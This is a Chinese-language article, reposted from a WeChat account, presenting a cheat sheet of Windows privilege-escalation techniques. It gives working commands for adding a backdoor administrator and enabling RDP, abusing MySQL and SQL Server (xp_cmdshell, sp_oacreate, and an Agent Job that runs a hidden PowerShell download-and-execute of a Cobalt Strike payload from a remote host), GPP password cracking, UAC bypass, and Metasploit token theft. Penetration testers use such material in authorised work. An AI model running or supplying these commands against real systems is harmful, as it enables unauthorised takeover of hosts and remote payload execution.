Windows提權的幾種常用姿勢
本文轉(zhuǎn)載自微信公眾號「Bypass」,作者Bypass 。轉(zhuǎn)載本文請聯(lián)系Bypass公眾號。
當獲取主機權限時,我們總是希望可以將普通用戶提升為管理員用戶,以便獲得高權限完全控制目標主機。Windows常用的提權方式有:內(nèi)核提權、數(shù)據(jù)庫提權、系統(tǒng)配置錯誤提權、組策略首選項提權、Bypass UAC提權、令牌竊取提權等姿勢。
1. 內(nèi)核溢出漏洞提權
由于目標系統(tǒng)沒有及時安裝補丁,攻擊者可以利用Windows系統(tǒng)內(nèi)核溢出漏洞進行提權,輕易獲取system權限。
(1) 通過systeminfo比對KB編號,發(fā)現(xiàn)系統(tǒng)是否存在漏洞。
github項目地址:https://github.com/AonCyberLabs/Windows-Exploit-Suggester
(2) 找到對應漏洞的exp執(zhí)行,獲取system權限
github項目地址:https://github.com/SecWiki/windows-kernel-exploits
(3) 添加管理員
- net user 用戶名 密碼 /add
- net localgroup Administrators 用戶名 /add
(4) 開啟遠程桌面
- # 開啟遠程
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
- # 查詢遠程端口
- REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
2. 數(shù)據(jù)庫提權
(1) MySQL提權
利用mysql的幾種提權方式,如udf提權、mof提權、啟動項提權等。
- udf提權:通過創(chuàng)建用戶自定義函數(shù),對mysql功能進行擴充,可以執(zhí)行系統(tǒng)任意命令,將mysql賬號root轉(zhuǎn)化為系統(tǒng)system權限。
- mof提權:在windows平臺下,c:/windows/system32/wbem/mof/nullevt.mof 這個文件會每間隔一段時間(很短暫)就會以system權限執(zhí)行一次,所以,只要我們將我們先要做的事通過代碼存儲到這個mof文件中,就可以實現(xiàn)權限提升。
- 啟動項提權:將后面腳本上傳到系統(tǒng)啟動目錄,當服務器重啟就會自動執(zhí)行該腳本,從而獲取系統(tǒng)權限。
(2) SQL Server 提權
利用SQL Sercer執(zhí)行系統(tǒng)命令的方式也有多種,比如xp_cmdshell、SP_OACREATE、沙盒、Agent Job、CLR來提權。
使用xp_cmdshell進行提權:
- # 啟用xp_cmdshell
- EXEC master..sp_configure 'show advanced options', 1;RECONFIGURE;EXEC master..sp_configure 'xp_cmdshell', 1;RECONFIGURE;
- # 通過xp_cmdshell執(zhí)行系統(tǒng)命令
- Exec master.dbo.xp_cmdshell 'whoami'
SP_OACREATE:
- # 開啟組件
- EXEC sp_configure 'show advanced options', 1;RECONFIGURE WITH OVERRIDE;EXEC sp_configure 'Ole Automation Procedures', 1;RECONFIGURE WITH OVERRIDE;
- EXEC sp_configure 'show advanced options', 0;
- # 執(zhí)行系統(tǒng)命令(無回顯)
- declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c whoami'
通過沙盒執(zhí)行命令:
- # 開啟沙盒
- exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
- # 利用jet.oledb執(zhí)行命令
- select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\dnary.mdb','select shell("whoami")')
通過Agent Job執(zhí)行命令:
修改開啟Ageent Job,執(zhí)行無回顯CobaltStrike生成powershell上線
- USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1' ; EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://192.168.214.129:80/a''))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';
3. 系統(tǒng)配置錯誤提權
(1) 權限配置錯誤
如果管理員權限配置錯誤,將導致低權限用戶對高權限運行的文件擁有寫入權限,那么低權限用戶就可以替換成惡意后門文件,獲取系統(tǒng)權限。一般在啟動項、計劃任務,服務里查找錯誤配置,嘗試提權。
(2) 可信任服務路徑漏洞
(3) 不安全的注冊表權限配置
如果低權限用戶對程序路徑所對應的鍵值有寫權限,那么就可以控制這個服務,運行后門程序,從而獲取權限。
- # 存儲Windows服務有關的信息
- HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
- # 服務對應的程序路徑存儲
- HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service\服務名\ImagePath
- 3.4 AlwaysInstallElevated
注冊表鍵AlwaysInstallElevated是一個策略設置項。windows允許低權限用戶以System權限運行安裝文件。如果啟用此策略設置項,那么任何權限用戶都能以NT AUTHORITY\SYSTEM權限來安裝惡意的MSI(Microsoft Windows Installer)文件。
4. 組策略首選項提權
SYSVOL是域內(nèi)的共享文件夾,用來存放登錄腳本、組策略腳本等信息。當域管理員通過組策略修改密碼時,在腳本中引入用戶密碼,就可能導致安全問題。
(1) 訪問SYSVOL共享文件夾,搜索包含“cpassword”的XML文件,獲取AES加密的密碼。
(2) 使用kali自帶的gpp-decrypt進行破解
5. Bypass UAC提權
UAC(User Account Control,用戶賬號控制),是微軟引入的一種安全機制。Bypass UAC提權,可以將管理員權限提升到system權限。
使用msf模塊:
- msf5 exploit(multi/handler) > use exploit/windows/local/bypassuac
- meterpreter > getuid
- meterpreter > getsystem
6. 令牌竊取提權
通過竊取令牌獲取管理員權限,在MSF中,可以使用incognito實現(xiàn)token竊取。
- meterpreter > use incognito #進入incognito模塊
- meterpreter > list_tokens -u #列出令牌
- meterpreter > impersonate_token "NT AUTHORITY\SYSTEM" #模擬令牌
